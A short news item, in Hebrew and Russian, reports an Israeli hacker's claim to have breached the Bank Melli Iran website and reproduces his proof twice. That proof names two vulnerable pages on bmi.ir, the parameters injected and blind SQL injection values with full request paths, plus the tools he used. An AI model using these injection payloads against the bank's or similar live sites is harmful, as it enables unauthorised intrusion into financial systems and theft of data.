האקר ישראלי טוען כי פרץ לאתר בנק איראני

ב-13 ביוני פרסם ההאקר הישראלי Amenefus הודעה ובה פנה ל-An0nGhost ולתושבי איראן בטענה כי עלה בידו לפרוץ לאתר של Bank Melli Iran. להוכחת דבריו הוא פרסם את הפרטים הבאים;

Target; wWw.BMi.iR (Bank Melli Iran)
Look kids(=An0nGhost). this is how to SQLi a bank in Iran.[!]


Blind SQLi 1;
http://bmi.ir/fa/objectslist.aspx
————————————————————————————
|GET input tid was set to -1' or 67 = '65                                          |
|code: POST /fa/objectslist.aspx?cid=5&smnuid=34&tid=-1%27%20or%2067%20%3d%20%2765 |
————————————————————————————

Blind SQLi 2;
http://bmi.ir/fa/publishlist.aspx
————————————————————————————
|POST input ctl00%24Footer2%24ImageButtonRSSFeed was set to -1' or 36 = '34        |
|POST /fa/publishlist.aspx?cid=0&page=2                                            |
————————————————————————————

succeed with SQLMap, nMap, Havij, BlindCat.

13 июня, израильский хакер, известный как "Amenefus", опубликовал заявление об успешном взломе сайта иранского банка " Bank Melli Iran". Для подтверждения он опубликовал следующие данные:

Target; wWw.BMi.iR (BankMelliIran)

Look kids(=An0nGhost). this is how to SQLi a bank in Iran.[!]

Blind SQLi 1;

http://bmi.ir/fa/objectslist.aspx

————————————————————————————

|GET input tid was set to -1′ or 67 = '65                                          |

|code: POST /fa/objectslist.aspx?cid=5&smnuid=34&tid=-1%27%20or%2067%20%3d%20%2765 |

————————————————————————————

Blind SQLi 2;

http://bmi.ir/fa/publishlist.aspx

————————————————————————————

|POST input ctl00%24Footer2%24ImageButtonRSSFeed was set to -1′ or 36 = '34        |

|POST /fa/publishlist.aspx?cid=0&page=2                                            |

————————————————————————————

succeed with SQLMap, nMap, Havij, BlindCat.